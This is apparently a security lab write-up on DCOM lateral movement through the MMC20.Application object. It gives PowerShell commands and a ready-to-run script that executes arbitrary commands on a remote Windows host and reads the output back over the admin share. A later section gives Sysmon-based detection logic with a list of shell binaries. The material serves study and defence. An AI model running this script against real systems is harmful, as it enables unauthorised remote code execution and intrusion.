Lateral Movement via DCOM
Lateral Movement via Distributed Component Object Model
The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents) and ActiveX (Internet-enabled components), among others. DCOM extends COM so that an object can be activated on, and called over the network from, a remote machine.
This lab explores a DCOM lateral movement technique using the MMC20.Application COM object, as originally researched by @enigma0x3 in his blog post "Lateral Movement using the MMC20.Application COM Object".

Execution

The MMC20.Application COM class is registered under HKEY_CLASSES_ROOT, as shown below (the WOW6432Node key is the 32-bit registry view on a 64-bit system; the same CLSID is what the ProgID MMC20.Application.1 resolves to):
The same can be checked with PowerShell:
Get-ChildItem 'registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\{49B2791A-B1AE-4C90-9B8E-E860BA07F889}'
Establishing a connection to the victim host (10.0.0.2). The ProgID is resolved and the object is activated remotely, which requires the current user to have DCOM launch and activation rights on the target (local administrators have them by default) and TCP/135 plus the dynamic RPC port range to be reachable:
$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
Executing a command on the victim system via the DCOM object. The ExecuteShellCommand arguments are Command, Directory, Parameters and WindowState; "7" is the window state value used in the original research. The method returns nothing, so the output is redirected to a file on the victim:
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c hostname > c:\fromdcom.txt","7")
Below is the command execution and its result: the output of hostname on the remote machine is written to c:\fromdcom.txt:
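The steps above, put together as one script that also retrieves the output and cleans up after itself. This is an added example, not code from the original lab or from enigma0x3's post. It assumes the lab values (target 10.0.0.2, output file c:\fromdcom.txt), that the caller is a local administrator on the target, that the C$ admin share is reachable over SMB for reading the result, and that the MMC Application object's Quit method is available for tearing down the remote mmc.exe (hypothetical cleanup step, not part of the original technique).

```powershell
# Added example (not from the original lab): MMC20.Application DCOM execution
# with result retrieval and cleanup. Assumed lab values: target 10.0.0.2,
# output file c:\fromdcom.txt. Requires local admin on the target, TCP/135 plus
# the dynamic RPC range, and SMB (C$) for reading the output back.
param(
    [string]$Target  = '10.0.0.2',          # victim host from the lab
    [string]$Command = 'hostname',          # command to run on the victim
    [string]$OutFile = 'c:\fromdcom.txt'    # output path on the victim
)

$ErrorActionPreference = 'Stop'

# 1. Confirm the class is registered locally (same CLSID as in the lab).
$clsid = '{49B2791A-B1AE-4C90-9B8E-E860BA07F889}'
$regPaths = @("registry::HKEY_CLASSES_ROOT\CLSID\$clsid",
              "registry::HKEY_CLASSES_ROOT\WOW6432Node\CLSID\$clsid")
if (-not ($regPaths | Where-Object { Test-Path $_ })) {
    Write-Warning "MMC20.Application CLSID not registered locally; remote activation may still work"
}

# 2. Remote activation: the DcomLaunch service on $Target starts mmc.exe under
#    the caller's identity and hands back a proxy to it.
$type = [type]::GetTypeFromProgID('MMC20.Application.1', $Target)
if ($null -eq $type) { throw "Could not resolve ProgID MMC20.Application.1 on $Target" }
$mmc = [System.Activator]::CreateInstance($type)

try {
    # 3. Execute. Arguments: Command, Directory, Parameters, WindowState ("7" as
    #    in the original research). Output is redirected because the method
    #    returns nothing.
    $mmc.Document.ActiveView.ExecuteShellCommand('cmd', $null, "/c $Command > $OutFile", '7')

    # 4. Read the result back over the admin share: c:\fromdcom.txt -> \\target\c$\fromdcom.txt
    $share = "\\$Target\" + $OutFile.Substring(0, 1) + '$' + $OutFile.Substring(2)
    $deadline = (Get-Date).AddSeconds(10)
    while (-not (Test-Path $share) -and (Get-Date) -lt $deadline) { Start-Sleep -Milliseconds 500 }
    if (Test-Path $share) {
        Write-Output "Result from ${Target}:"
        Get-Content $share
    } else {
        Write-Warning "No output file at $share (command failed, or SMB to the target is blocked)"
    }
}
finally {
    # 5. Cleanup (assumed step): Quit() ends mmc.exe on the target so it does not
    #    linger as an orphaned -Embedding process; ReleaseComObject drops the proxy.
    try { $mmc.Quit() } catch { }
    [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($mmc)
}
```

Run it from an elevated PowerShell session as a user who is a local administrator on the target, e.g. `.\Invoke-MmcDcom.ps1 -Target 10.0.0.2 -Command whoami`. Without the cleanup step the remote mmc.exe stays running after the call, which is exactly the artifact the Observations section below relies on.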

Observations

Once the connection from the attacker to the victim is established using the PowerShell below:
[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
this is what happens on the victim system: svchost.exe (the process hosting the DcomLaunch service) spawns mmc.exe, which then opens a listening port via an RPC binding. A shell started through ExecuteShellCommand subsequently appears as a child of that mmc.exe, a parent/child pair that does not occur in normal interactive MMC use:
A network connection from 10.0.0.7 (attacker) to 10.0.0.2 (victim) is logged under the account offense\administrator, which is also visible in the screenshot above:
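The two observations above (mmc.exe started by the DcomLaunch svchost, then an inbound connection to it and a shell child) translate directly into detection logic. The following is an added example, not part of the original lab: a function that evaluates Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records and flags the chain, run over a small set of constructed records modelled on the lab's 10.0.0.7 to 10.0.0.2 activity. The field names (Image, ParentImage, ParentCommandLine, Initiated, SourceIp and so on) mirror Sysmon's, but the records, the `-Embedding` command lines and the port numbers are made up for the demonstration.

```powershell
# Added example (not from the original lab): detection of the MMC20.Application
# DCOM footprint over Sysmon-style records. Field names follow Sysmon Event ID 1
# (ProcessCreate) and Event ID 3 (NetworkConnect); all sample data is constructed.

function Find-DcomMmcActivity {
    param([Parameter(Mandatory)][object[]]$Events)

    $findings = @()
    foreach ($e in $Events) {
        switch ($e.EventId) {
            1 {
                # Server-side footprint of remote activation: the DcomLaunch
                # svchost starts mmc.exe. Interactive use comes from explorer.exe.
                if ($e.Image -match '\\mmc\.exe$' -and
                    $e.ParentImage -match '\\svchost\.exe$' -and
                    $e.ParentCommandLine -match 'DcomLaunch') {
                    $findings += [pscustomobject]@{
                        Rule = 'mmc.exe spawned by DcomLaunch'; Host = $e.Computer
                        User = $e.User; Detail = $e.CommandLine }
                }
                # ExecuteShellCommand gives mmc.exe a shell child; mmc.exe normally
                # has no child processes at all.
                if ($e.ParentImage -match '\\mmc\.exe$' -and
                    $e.Image -match '\\(cmd|powershell|pwsh|wscript|cscript|rundll32)\.exe$') {
                    $findings += [pscustomobject]@{
                        Rule = 'shell spawned by mmc.exe'; Host = $e.Computer
                        User = $e.User; Detail = $e.CommandLine }
                }
            }
            3 {
                # Inbound RPC connection to the freshly started mmc.exe (the
                # listening port seen in the lab).
                if ($e.Image -match '\\mmc\.exe$' -and $e.Initiated -eq $false) {
                    $findings += [pscustomobject]@{
                        Rule = 'inbound connection to mmc.exe'; Host = $e.Computer
                        User = $e.User
                        Detail = "$($e.SourceIp):$($e.SourcePort) -> $($e.DestinationIp):$($e.DestinationPort)" }
                }
            }
        }
    }
    return $findings
}

# Constructed sample records (not real telemetry) modelled on the lab activity.
$sample = @(
    [pscustomobject]@{ EventId=1; Computer='victim'; User='OFFENSE\administrator'
        Image='C:\Windows\System32\mmc.exe'; CommandLine='"C:\Windows\system32\mmc.exe" -Embedding'
        ParentImage='C:\Windows\System32\svchost.exe'; ParentCommandLine='C:\Windows\system32\svchost.exe -k DcomLaunch -p' }
    [pscustomobject]@{ EventId=3; Computer='victim'; User='OFFENSE\administrator'
        Image='C:\Windows\System32\mmc.exe'; Initiated=$false
        SourceIp='10.0.0.7'; SourcePort=49821; DestinationIp='10.0.0.2'; DestinationPort=49675 }
    [pscustomobject]@{ EventId=1; Computer='victim'; User='OFFENSE\administrator'
        Image='C:\Windows\System32\cmd.exe'; CommandLine='cmd /c hostname > c:\fromdcom.txt'
        ParentImage='C:\Windows\System32\mmc.exe'; ParentCommandLine='"C:\Windows\system32\mmc.exe" -Embedding' }
    # Benign control: an administrator opening MMC from the desktop.
    [pscustomobject]@{ EventId=1; Computer='victim'; User='OFFENSE\administrator'
        Image='C:\Windows\System32\mmc.exe'; CommandLine='"C:\Windows\system32\mmc.exe"'
        ParentImage='C:\Windows\explorer.exe'; ParentCommandLine='C:\Windows\Explorer.EXE' }
)

# Expected: three findings (DcomLaunch -> mmc.exe, inbound connection, mmc.exe -> cmd.exe);
# the explorer.exe-launched mmc.exe is not flagged.
Find-DcomMmcActivity -Events $sample | Format-Table -AutoSize
```

To run this over live data, read `Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'` and map each event's `Properties` into objects with the field names above; the DcomLaunch-to-mmc.exe rule on its own is the highest-signal one, since the `-Embedding` launch by svchost.exe has no legitimate interactive equivalent.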

References

Lateral Movement using the MMC20.Application COM Object - enigma0x3
View.ExecuteShellCommand method - docs.microsoft.com
Type.GetTypeFromCLSID Method (System) - docs.microsoft.com
COM Technical Overview - Win32 apps - docs.microsoft.com
https://attack.mitre.org/wiki/Technique/T1175 - attack.mitre.org (T1175 has since been deprecated in favour of T1021.003, Remote Services: Distributed Component Object Model)